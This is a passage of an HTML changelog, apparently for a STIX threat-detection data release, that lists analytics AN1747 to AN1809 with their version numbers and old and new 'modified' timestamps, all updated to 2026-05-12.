Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-02 17:41:17.052000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1747] Analytic 1747</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-06 15:07:15.622000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.375000+00:00</td></tr></tbody></table></details><hr><h4>[AN1748] Analytic 1748</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-06 18:43:26.902000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1751] Analytic 1751</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 18:53:00.289000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1752] Analytic 1752</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 19:12:28.428000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1753] Analytic 1753</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-24 17:54:57.531000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1754] Analytic 1754</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-24 17:56:26.375000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1755] Analytic 1755</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-23 17:50:48.706000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1756] Analytic 1756</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-23 17:58:13.523000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1758] Analytic 1758</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-12-04 17:12:06.342000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.384000+00:00</td></tr></tbody></table></details><hr><h4>[AN1759] Analytic 1759</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-16 15:51:26.313000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1762] Analytic 1762</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-06 15:51:25.896000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1763] Analytic 1763</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-06 15:53:14.197000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1764] Analytic 1764</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-24 17:47:35.979000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1767] Analytic 1767</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-08 16:39:38.897000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1768] Analytic 1768</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-08 18:29:03.808000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1770] Analytic 1770</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-17 19:52:38.107000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1771] Analytic 1771</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-17 20:24:52.509000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1772] Analytic 1772</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-04 23:26:47.489000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1773] Analytic 1773</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-04 23:33:56.647000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1774] Analytic 1774</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-23 17:29:42.280000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1776] Analytic 1776</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-04 23:46:03.218000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1777] Analytic 1777</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-04 23:47:29.735000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1778] Analytic 1778</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 19:36:34.664000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1779] Analytic 1779</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 19:53:20.408000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1780] Analytic 1780</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-22 19:50:50.601000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1781] Analytic 1781</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-12 17:25:00.733000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1782] Analytic 1782</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-23 20:22:40.361000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1784] Analytic 1784</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-02 16:07:33.370000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1785] Analytic 1785</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-02 16:21:09.206000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1788] Analytic 1788</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-18 18:06:39.579000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1789] Analytic 1789</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-18 19:33:15.080000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.375000+00:00</td></tr></tbody></table></details><hr><h4>[AN1793] Analytic 1793</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-04 23:55:34.960000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1794] Analytic 1794</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-04 23:56:19.093000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1795] Analytic 1795</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-23 22:55:59.738000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1797] Analytic 1797</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:30:37.215000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1800] Analytic 1800</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-13 18:04:23.913000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1801] Analytic 1801</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:30:17.842000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1802] Analytic 1802</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-10 15:33:30.111000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1803] Analytic 1803</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-10 23:16:21.386000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1804] Analytic 1804</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-23 16:59:44.335000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1805] Analytic 1805</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-23 17:10:37.953000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1806] Analytic 1806</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:30:26.476000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1807] Analytic 1807</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-13 15:50:52.912000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.375000+00:00</td></tr></tbody></table></details><hr><h4>[AN1808] Analytic 1808</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-19 20:20:49.044000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1809] Analytic 1809</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-23 20:54:34.747000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 